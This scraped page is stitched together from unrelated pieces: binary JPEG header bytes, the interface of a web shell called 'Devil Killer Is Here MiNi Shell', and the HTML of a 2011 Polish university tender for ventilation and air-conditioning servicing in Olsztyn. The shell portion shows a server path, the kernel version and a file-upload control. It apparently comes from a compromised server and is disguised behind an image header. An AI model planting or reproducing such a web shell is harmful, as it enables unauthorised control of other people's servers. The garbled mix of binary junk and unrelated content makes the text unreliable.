JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111129/402562-N-2011.html

<p class="kh_header"><b>Olsztyn: Serwis urządzeń wentylacyjnych i klimatyzacyjnych w obiektach Uniwersytetu Warmińsko-Mazurskiego w Olsztynie</b><br>
<b>Numer ogłoszenia: 402562 - 2011; data zamieszczenia: 29.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uwm.edu.pl/zamowienia</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Serwis urządzeń wentylacyjnych i klimatyzacyjnych w obiektach Uniwersytetu Warmińsko-Mazurskiego w Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest obsługa serwisowa systemów wentylacyjno-klimatyzacyjnych w poszczególnych budynkach  - zapewniająca sprawne ich funkcjonowanie, polegająca na:
1)  dokonywaniu przeglądów urządzeń i ocenie ich stanu technicznego;
2) wykonywaniu czynności konserwacyjnych (czyszczenie, odkurzanie, mycie, dezynfekcja, udrażnianie);
3)  kontrolowaniu i regulacji parametrów pracy urządzeń (w tym min. temperatury i ciśnienia);
4)  testowaniu układów automatyki;
5)  każdorazowym sporządzaniu protokołów z wykonanych czynności;
6) udzielaniu porad i doraźnych instrukcji w zakresie prawidłowej eksploatacji tych urządzeń dla   Użytkownika lub Administratora;
7)  przyjmowanie zgłoszeń usterek od Użytkownika i przyjazd ekipy serwisowej w ciągu 1 godziny.
2. Prace serwisowe w poszczególnych obiektach należy przeprowadzać zgodnie z harmonogramem    uzgodnionym z inspektorem nadzoru Zamawiającego i Administratorem, co 6 miesięcy .
3. Ustala się następujący zakres prac serwisowych:       
1)  oględziny ogólne i ocena stanu technicznego poszczególnych urządzeń wentylacyjnych;
2) ocena stanu technicznego zespołu wentylatorowego /kontrola stanu zużycia łożysk, smarowanie,  regulacja napędu ,czyszczenie wentylatorów/;
3) ocena stanu wymienników ciepła, czyszczenie i prostowanie lamel ,czyszczenie całego  wymiennika rotacyjnego;
4)   sprawdzanie funkcjonowania przepustnic, oraz ich ewentualna regulacja;
5)   sprawdzanie drożności instalacji odprowadzenia skroplin, zalanie syfonu, czyszczenie z osadu;
6)   sprawdzenie stopnia zabrudzenia filtrów, ich czyszczenie lub wymiana, oraz oczyszczenie komory filtracyjnej;
7)   pomiar prądów pobieranych przez odbiorniki energii elektrycznej;
8) kontrola pracy i przetestowanie układu automatyki kontrolno-pomiarowej, sprawdzenie  poprawności działania zainstalowanych zabezpieczeń ,oraz układów wody lodowej i ciepła technologicznego urządzeń, instalacji freonowych, instalacji elektrycznych zasilania i sterowania z usuwaniem usterek  i awarii;
9)   kontrola i regulacja parametrów pracy i przepływu powietrza przez urządzenie;
10)  bieżące prace konserwacyjne (odkurzanie, mycie, dezynfekcja przestrzeni central  wentylacyjnych );
11) sporządzanie na bieżąco protokołów serwisowych z przeprowadzonej konserwacji dla każdej centrali wentylacyjnej raz w miesiącu, potwierdzonych przez Użytkownika lub  Administratora obiektu;
12) przestrzeganie wszystkich innych zaleceń serwisowych zgodnie z instrukcją urządzeń wentylacyjno-klimatyzacyjnych producenta central wentylacyjnych, klimatyzatorów, wentylatorów, agregatów wody lodowej itp.
4.  Prace serwisowe należy prowadzić zgodnie z obowiązującymi normami, przepisami BHP i   Ppoż. oraz dokumentacją techniczno-ruchową producentów urządzeń wraz z serwisem  towarzyszących urządzeniom instalacji ciepła technologicznego, wody lodowej, instalacji freonowej, instalacji elektrycznej zasilania i sterowania.
5.  Każdorazowy przyjazd ekipy serwisowej należy potwierdzić w sekretariacie Biura Technicznego  pod numer telefonu 89/ 523-43-70, na co najmniej 2 (dwa) dni przed ustalonym terminem  przeglądu.
6. W przypadku zgłoszenia przez zamawiającego konieczności usunięcia awarii wymagającej  natychmiastowej naprawy, wykonawca zobowiązany jest do zgłoszenia się pod wskazany adres  w ciągu 1(jednej) godziny od otrzymania powiadomienia.
7. W przypadku konieczności usunięcia usterki lub dokonania naprawy - po zgłoszeniu tego faktu w    protokole serwisowym - wykonawca uzgodni z zamawiającym zakres, termin i koszty w trybie  odrębnej umowy. 
8. Wykonawca po wykonaniu każdej czynności serwisowej będzie sporządzał protokół, pod którym   powinien uzyskać podpis administratora danego obiektu lub inspektora nadzoru, potwierdzający  należyte jej wykonanie.
9. Wykonawca na własny koszt dostarczy niezbędne części i materiały do przeprowadzenia prac konserwacyjnych oraz udzieli na nie gwarancji na okres wyznaczony przez producenta.
10. Zamawiający zapewni dostęp do urządzeń objętych usługą w obiektach wymienionych w  niniejszym  załączniku oraz do źródeł wody i energii elektrycznej.
11. Podstawą do kwartalnego rozliczenia i wystawienia faktury będzie wartość kwartalna brutto podana przez wykonawcę w zamieszczonej poniżej tabeli, po należytym wykonaniu prac serwisowych i sporządzeniu protokołu serwisowego, potwierdzonego przez administratora danego obiektu lub inspektora nadzoru.
12. Pominięcie w przeglądzie i protokole, któregokolwiek z wymienionych w tabeli urządzeń lub      niesumienne wykonanie usługi w zakresie konkretnego urządzenia, może spowodować obniżenie miesięcznego wynagrodzenia o kwotę wynikającą z tabeli.
13. Opis przedmiotu zamówienia przedstawiony został w formularzu cenowym - załączniku nr 2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 59.07.30.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie w/wym. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	W zakresie w/wym. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie w/wym. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W zakresie warunku wyżej wymienionego w części nr 1 i 2 wykonawca wykaże, że dysponuje lub będzie dysponować minimum 4 osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi świadectwa kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń , instalacji i  sieci w grupie 2 wg załącznika nr 1 rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dn. 28.04.2003r. (Dz.U.2003.89.828 z późn. zmianami);
2. W zakresie warunku wyżej wskazanego wykonawca wykaże, że posiada autoryzację firm Jujitsu, Lennox, VTS na wykonywanie przeglądów gwarancyjnych i pogwarancyjnych urządzeń klimatyzacyjnych, których producentami są w/w firmy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie w/wym. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny spełniania warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem pieczęcią Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego oraz jej podpisem. 
2. Sporządzony przez Wykonawcę, według wzoru zamieszczonego na stronie internetowej : www.uwm.edu.pl/zamowienia - Formularz ofertowy,
3. Sporządzony przez Wykonawcę, według wzoru zamieszczonego na stronie internetowej: www.uwm.edu.pl/zamowienia - Formularz cenowy,
4. Certyfikaty wystawione przez firmy Jujitsu, Lennox, VTS w zakresie części nr 2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszcza się zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zmiany dotyczą okoliczności opisanych w pkt. 2. 
2. Zamawiający przewiduje w ramach zawartej umowy zmiany dotyczące:
a)zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności nie dających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej,
b)zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uwm.edu.pl/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie,
Dział Zamówień Publicznych,
ul. m. Oczapowskiego 2,pok. 311,
10- 719 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2011 godzina 10:00, miejsce: Uniwersytet Warmińsko-Mazurski w Olsztynie,
Dział Zamówień Publicznych,
ul. m. Oczapowskiego 2,pok. 309,
10- 719 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Serwis urządzeń wentylacyjnych i klimatyzacyjnych w obiektach Uniwersytetu Warmińsko-Mazurskiego w Olsztynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest obsługa serwisowa systemów wentylacyjno-klimatyzacyjnych w poszczególnych budynkach  - zapewniająca sprawne ich funkcjonowanie, polegająca na:
     1)  dokonywaniu przeglądów urządzeń i ocenie ich stanu technicznego;
     2) wykonywaniu czynności konserwacyjnych (czyszczenie, odkurzanie, mycie, dezynfekcja,          udrażnianie);
     3)  kontrolowaniu i regulacji parametrów pracy urządzeń (w tym min. temperatury i ciśnienia);
     4)  testowaniu układów automatyki;
     5)  każdorazowym sporządzaniu protokołów z wykonanych czynności;
     6) udzielaniu porad i doraźnych instrukcji w zakresie prawidłowej eksploatacji tych urządzeń dla   Użytkownika lub Administratora;
     7)  przyjmowanie zgłoszeń usterek od Użytkownika i przyjazd ekipy serwisowej w ciągu 1 godziny.
2. Prace serwisowe w poszczególnych obiektach należy przeprowadzać zgodnie z harmonogramem    uzgodnionym z inspektorem nadzoru Zamawiającego i Administratorem, co 6 miesięcy .
3. Ustala się następujący zakres prac serwisowych:       
1)  oględziny ogólne i ocena stanu technicznego poszczególnych urządzeń wentylacyjnych;
   2) ocena stanu technicznego zespołu wentylatorowego /kontrola stanu zużycia łożysk, smarowanie,  regulacja napędu ,czyszczenie wentylatorów/;
     3) ocena stanu wymienników ciepła, czyszczenie i prostowanie lamel ,czyszczenie całego        wymiennika rotacyjnego;
     4)   sprawdzanie funkcjonowania przepustnic, oraz ich ewentualna regulacja;
     5)   sprawdzanie drożności instalacji odprowadzenia skroplin, zalanie syfonu, czyszczenie z osadu;
     6)   sprawdzenie stopnia zabrudzenia filtrów, ich czyszczenie lub wymiana, oraz oczyszczenie
           komory filtracyjnej;
     7)   pomiar prądów pobieranych przez odbiorniki energii elektrycznej;
     8) kontrola pracy i przetestowanie układu automatyki kontrolno-pomiarowej, sprawdzenie           poprawności działania zainstalowanych zabezpieczeń ,oraz układów wody lodowej i ciepła technologicznego urządzeń, instalacji freonowych, instalacji elektrycznych zasilania i sterowania z usuwaniem usterek  i awarii;
     9)   kontrola i regulacja parametrów pracy i przepływu powietrza przez urządzenie;
   10)  bieżące prace konserwacyjne /odkurzanie, mycie, dezynfekcja przestrzeni central  wentylacyjnych /;
   11) sporządzanie na bieżąco protokołów serwisowych z przeprowadzonej konserwacji dla każdej centrali wentylacyjnej raz w miesiącu, potwierdzonych przez Użytkownika lub  Administratora obiektu;
   12) przestrzeganie wszystkich innych zaleceń serwisowych zgodnie z instrukcją urządzeń wentylacyjno-klimatyzacyjnych producenta central wentylacyjnych, klimatyzatorów, wentylatorów, agregatów wody lodowej itp.
4.  Prace serwisowe należy prowadzić zgodnie z obowiązującymi normami, przepisami BHP i   Ppoż. oraz dokumentacją techniczno-ruchową producentów urządzeń wraz z serwisem  towarzyszących urządzeniom instalacji ciepła technologicznego, wody lodowej, instalacji freonowej, instalacji elektrycznej zasilania i sterowania.
5.  Każdorazowy przyjazd ekipy serwisowej należy potwierdzić w sekretariacie Biura Technicznego
     pod numer telefonu 89/ 523-43-70, na co najmniej 2 (dwa) dni przed ustalonym terminem  przeglądu.
6. W przypadku zgłoszenia przez zamawiającego konieczności usunięcia awarii wymagającej      natychmiastowej naprawy, wykonawca zobowiązany jest do zgłoszenia się pod wskazany adres   w ciągu 1(jednej) godziny od otrzymania powiadomienia.
7. W przypadku konieczności usunięcia usterki lub dokonania naprawy - po zgłoszeniu tego faktu w     protokole serwisowym - wykonawca uzgodni z zamawiającym zakres, termin i koszty w trybie      odrębnej umowy. 
8. Wykonawca po wykonaniu każdej czynności serwisowej będzie sporządzał protokół, pod którym     powinien uzyskać podpis administratora danego obiektu lub inspektora nadzoru, potwierdzający  należyte jej wykonanie.
9. Wykonawca na własny koszt dostarczy niezbędne części i materiały do przeprowadzenia prac konserwacyjnych oraz udzieli na nie gwarancji na okres wyznaczony przez producenta.
10. Zamawiający zapewni dostęp do urządzeń objętych usługą w obiektach wymienionych w  niniejszym  załączniku oraz do źródeł wody i energii elektrycznej.
11. Podstawą do kwartalnego rozliczenia i wystawienia faktury będzie wartość kwartalna brutto podana przez wykonawcę w zamieszczonej poniżej tabeli, po należytym wykonaniu prac serwisowych i sporządzeniu protokołu serwisowego, potwierdzonego przez administratora danego obiektu lub inspektora nadzoru.
12. Pominięcie w przeglądzie i protokole, któregokolwiek z wymienionych w tabeli urządzeń lub      niesumienne wykonanie usługi w zakresie konkretnego urządzenia, może spowodować obniżenie miesięcznego wynagrodzenia o kwotę wynikającą z poniższej tabeli..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Serwis urządzeń wentylacyjnych i klimatyzacyjnych w obiektach Uniwersytetu Warmińsko-Mazurskiego w Olsztynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest obsługa serwisowa systemów wentylacyjno-klimatyzacyjnych w poszczególnych budynkach  - zapewniająca sprawne ich funkcjonowanie, polegająca na:
     1)  dokonywaniu przeglądów urządzeń i ocenie ich stanu technicznego;
     2) wykonywaniu czynności konserwacyjnych (czyszczenie, odkurzanie, mycie, dezynfekcja,      udrażnianie);
     3)  kontrolowaniu i regulacji parametrów pracy urządzeń (w tym min. temperatury i ciśnienia);
     4)  testowaniu układów automatyki;
     5)  każdorazowym sporządzaniu protokołów z wykonanych czynności;
     6) udzielaniu porad i doraźnych instrukcji w zakresie prawidłowej eksploatacji tych urządzeń dla   Użytkownika lub Administratora;
     7)  przyjmowanie zgłoszeń usterek od Użytkownika i przyjazd ekipy serwisowej w ciągu 1 godziny.
2. Prace serwisowe w poszczególnych obiektach należy przeprowadzać zgodnie z harmonogramem    uzgodnionym z inspektorem nadzoru Zamawiającego i Administratorem, co 6 miesięcy .
3. Ustala się następujący zakres prac serwisowych:       
1)  oględziny ogólne i ocena stanu technicznego poszczególnych urządzeń wentylacyjnych;
   2) ocena stanu technicznego zespołu wentylatorowego /kontrola stanu zużycia łożysk, smarowanie,  regulacja napędu ,czyszczenie wentylatorów/;
     3) ocena stanu wymienników ciepła, czyszczenie i prostowanie lamel ,czyszczenie całego    wymiennika rotacyjnego;
     4)   sprawdzanie funkcjonowania przepustnic, oraz ich ewentualna regulacja;
     5)   sprawdzanie drożności instalacji odprowadzenia skroplin, zalanie syfonu, czyszczenie z osadu;
     6)   sprawdzenie stopnia zabrudzenia filtrów, ich czyszczenie lub wymiana, oraz oczyszczenie   komory filtracyjnej;
     7)   pomiar prądów pobieranych przez odbiorniki energii elektrycznej;
     8) kontrola pracy i przetestowanie układu automatyki kontrolno-pomiarowej, sprawdzenie   poprawności działania zainstalowanych zabezpieczeń ,oraz układów wody lodowej i ciepła technologicznego urządzeń, instalacji freonowych, instalacji elektrycznych zasilania i sterowania z usuwaniem usterek  i awarii;
     9)   kontrola i regulacja parametrów pracy i przepływu powietrza przez urządzenie;
   10)  bieżące prace konserwacyjne /odkurzanie, mycie, dezynfekcja przestrzeni central  wentylacyjnych /;
   11) sporządzanie na bieżąco protokołów serwisowych z przeprowadzonej konserwacji dla każdej centrali wentylacyjnej raz w miesiącu, potwierdzonych przez Użytkownika lub  Administratora obiektu;
   12) przestrzeganie wszystkich innych zaleceń serwisowych zgodnie z instrukcją urządzeń wentylacyjno-klimatyzacyjnych producenta central wentylacyjnych, klimatyzatorów, wentylatorów, agregatów wody lodowej itp.
